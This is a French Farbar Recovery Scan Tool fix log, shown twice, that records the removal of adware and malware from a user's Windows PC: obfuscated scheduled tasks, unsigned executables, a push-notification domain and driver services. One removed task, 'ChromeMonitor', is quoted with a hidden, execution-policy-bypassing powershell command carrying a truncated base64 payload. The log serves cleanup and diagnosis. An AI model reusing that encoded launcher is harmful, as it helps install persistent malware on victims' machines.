Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 10-01-2022 01
Exécuté par Séb (12-01-2022 09:53:16) Run:1
Exécuté depuis C:\Users\Séb\Downloads
Profils chargés: Séb
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
GroupPolicy: Restriction ?
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction
Task: {16D6A1F0-B63A-4E84-84C4-D00FA9B4029B} - System32\Tasks\r522d9\n8txqa\fffbt9\z194sc\czhi7p\jiadhu\l6e69n\6t0xdf\osjrem\0am5af\l0j9fi\tg3t94\cwo3dh\reyo3g\hcat5z\qt7jta\zgviq7 => C:\Program Files (x86)\Sclerosing\sdn.exe (Pas de fichier)
Task: {66867DB2-AC93-456C-81DF-34D7CDFA7B3C} - System32\Tasks\ph9d7j\l14v5c\yhl7j1\6sw5ms\r3s5cl\h36mc9\s6hev8\nlq4nw\la0oov\3k2xnn\t1yetr\mk0701\0kax79\pi96rf\n4tboz\jx29nk\krxyfo => C:\Users\Séb\AppData\Local\barthelme.exe [39663 2021-12-10] () [Fichier non signé]
Task: {6808E14E-563E-40A8-BBA2-042EE74D77E9} - System32\Tasks\ChromeMonitor => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 6023 caractères en plus).
Task: {F15C320F-F9C6-4A7B-B5D1-1ED2382EB4CB} - System32\Tasks\AdvancedUpdater => C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe [1010800 2021-04-12] (Microleaves LTD -> AW Manager)
CHR Notifications: Default -> hxxps://shopperplus.webpush.freshchat.com
S3 cpuz145; \??\C:\Windows\temp\cpuz145\cpuz145_x64.sys [X]
S3 iobit_monitor_server; \??\C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\drivers\Monitor_win10_x64.sys [X]
EmptyTemp:
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\Windows\system32\GroupPolicy\Machine => déplacé(es) avec succès
C:\Windows\system32\GroupPolicy\GPT.ini => déplacé(es) avec succès
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => déplacé(es) avec succès
HKLM\SOFTWARE\Policies\Mozilla => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{16D6A1F0-B63A-4E84-84C4-D00FA9B4029B}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{16D6A1F0-B63A-4E84-84C4-D00FA9B4029B}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\r522d9\n8txqa\fffbt9\z194sc\czhi7p\jiadhu\l6e69n\6t0xdf\osjrem\0am5af\l0j9fi\tg3t94\cwo3dh\reyo3g\hcat5z\qt7jta\zgviq7 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\r522d9\n8txqa\fffbt9\z194sc\czhi7p\jiadhu\l6e69n\6t0xdf\osjrem\0am5af\l0j9fi\tg3t94\cwo3dh\reyo3g\hcat5z\qt7jta\zgviq7" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{66867DB2-AC93-456C-81DF-34D7CDFA7B3C}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{66867DB2-AC93-456C-81DF-34D7CDFA7B3C}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ph9d7j\l14v5c\yhl7j1\6sw5ms\r3s5cl\h36mc9\s6hev8\nlq4nw\la0oov\3k2xnn\t1yetr\mk0701\0kax79\pi96rf\n4tboz\jx29nk\krxyfo => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ph9d7j\l14v5c\yhl7j1\6sw5ms\r3s5cl\h36mc9\s6hev8\nlq4nw\la0oov\3k2xnn\t1yetr\mk0701\0kax79\pi96rf\n4tboz\jx29nk\krxyfo" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6808E14E-563E-40A8-BBA2-042EE74D77E9}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6808E14E-563E-40A8-BBA2-042EE74D77E9}" => supprimé(es) avec succès
"C:\Windows\System32\Tasks\ChromeMonitor" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ChromeMonitor" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F15C320F-F9C6-4A7B-B5D1-1ED2382EB4CB}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F15C320F-F9C6-4A7B-B5D1-1ED2382EB4CB}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\AdvancedUpdater => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AdvancedUpdater" => supprimé(es) avec succès
"Chrome Notifications" => supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\cpuz145 => supprimé(es) avec succès
cpuz145 => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\iobit_monitor_server => supprimé(es) avec succès
iobit_monitor_server => service supprimé(es) avec succès
=========== EmptyTemp: ==========
BITS transfer queue => 1310720 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10713555 B
Java, Flash, Steam htmlcache => 132708 B
Windows/system/drivers => 2176976 B
Edge => 0 B
Chrome => 355256796 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 11454 B
NetworkService => 11454 B
Séb => 6035991 B
RecycleBin => 80501 B
EmptyTemp: => 358.3 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
==== Fin de Fixlog 09:53:34 ====
Exécuté par Séb (12-01-2022 09:53:16) Run:1
Exécuté depuis C:\Users\Séb\Downloads
Profils chargés: Séb
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
GroupPolicy: Restriction ?
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction
Task: {16D6A1F0-B63A-4E84-84C4-D00FA9B4029B} - System32\Tasks\r522d9\n8txqa\fffbt9\z194sc\czhi7p\jiadhu\l6e69n\6t0xdf\osjrem\0am5af\l0j9fi\tg3t94\cwo3dh\reyo3g\hcat5z\qt7jta\zgviq7 => C:\Program Files (x86)\Sclerosing\sdn.exe (Pas de fichier)
Task: {66867DB2-AC93-456C-81DF-34D7CDFA7B3C} - System32\Tasks\ph9d7j\l14v5c\yhl7j1\6sw5ms\r3s5cl\h36mc9\s6hev8\nlq4nw\la0oov\3k2xnn\t1yetr\mk0701\0kax79\pi96rf\n4tboz\jx29nk\krxyfo => C:\Users\Séb\AppData\Local\barthelme.exe [39663 2021-12-10] () [Fichier non signé]
Task: {6808E14E-563E-40A8-BBA2-042EE74D77E9} - System32\Tasks\ChromeMonitor => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 6023 caractères en plus).
Task: {F15C320F-F9C6-4A7B-B5D1-1ED2382EB4CB} - System32\Tasks\AdvancedUpdater => C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe [1010800 2021-04-12] (Microleaves LTD -> AW Manager)
CHR Notifications: Default -> hxxps://shopperplus.webpush.freshchat.com
S3 cpuz145; \??\C:\Windows\temp\cpuz145\cpuz145_x64.sys [X]
S3 iobit_monitor_server; \??\C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\drivers\Monitor_win10_x64.sys [X]
EmptyTemp:
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\Windows\system32\GroupPolicy\Machine => déplacé(es) avec succès
C:\Windows\system32\GroupPolicy\GPT.ini => déplacé(es) avec succès
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => déplacé(es) avec succès
HKLM\SOFTWARE\Policies\Mozilla => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{16D6A1F0-B63A-4E84-84C4-D00FA9B4029B}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{16D6A1F0-B63A-4E84-84C4-D00FA9B4029B}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\r522d9\n8txqa\fffbt9\z194sc\czhi7p\jiadhu\l6e69n\6t0xdf\osjrem\0am5af\l0j9fi\tg3t94\cwo3dh\reyo3g\hcat5z\qt7jta\zgviq7 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\r522d9\n8txqa\fffbt9\z194sc\czhi7p\jiadhu\l6e69n\6t0xdf\osjrem\0am5af\l0j9fi\tg3t94\cwo3dh\reyo3g\hcat5z\qt7jta\zgviq7" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{66867DB2-AC93-456C-81DF-34D7CDFA7B3C}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{66867DB2-AC93-456C-81DF-34D7CDFA7B3C}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\ph9d7j\l14v5c\yhl7j1\6sw5ms\r3s5cl\h36mc9\s6hev8\nlq4nw\la0oov\3k2xnn\t1yetr\mk0701\0kax79\pi96rf\n4tboz\jx29nk\krxyfo => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ph9d7j\l14v5c\yhl7j1\6sw5ms\r3s5cl\h36mc9\s6hev8\nlq4nw\la0oov\3k2xnn\t1yetr\mk0701\0kax79\pi96rf\n4tboz\jx29nk\krxyfo" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6808E14E-563E-40A8-BBA2-042EE74D77E9}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6808E14E-563E-40A8-BBA2-042EE74D77E9}" => supprimé(es) avec succès
"C:\Windows\System32\Tasks\ChromeMonitor" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ChromeMonitor" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F15C320F-F9C6-4A7B-B5D1-1ED2382EB4CB}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F15C320F-F9C6-4A7B-B5D1-1ED2382EB4CB}" => supprimé(es) avec succès
C:\Windows\System32\Tasks\AdvancedUpdater => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AdvancedUpdater" => supprimé(es) avec succès
"Chrome Notifications" => supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\cpuz145 => supprimé(es) avec succès
cpuz145 => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\iobit_monitor_server => supprimé(es) avec succès
iobit_monitor_server => service supprimé(es) avec succès
=========== EmptyTemp: ==========
BITS transfer queue => 1310720 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10713555 B
Java, Flash, Steam htmlcache => 132708 B
Windows/system/drivers => 2176976 B
Edge => 0 B
Chrome => 355256796 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 11454 B
NetworkService => 11454 B
Séb => 6035991 B
RecycleBin => 80501 B
EmptyTemp: => 358.3 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
==== Fin de Fixlog 09:53:34 ====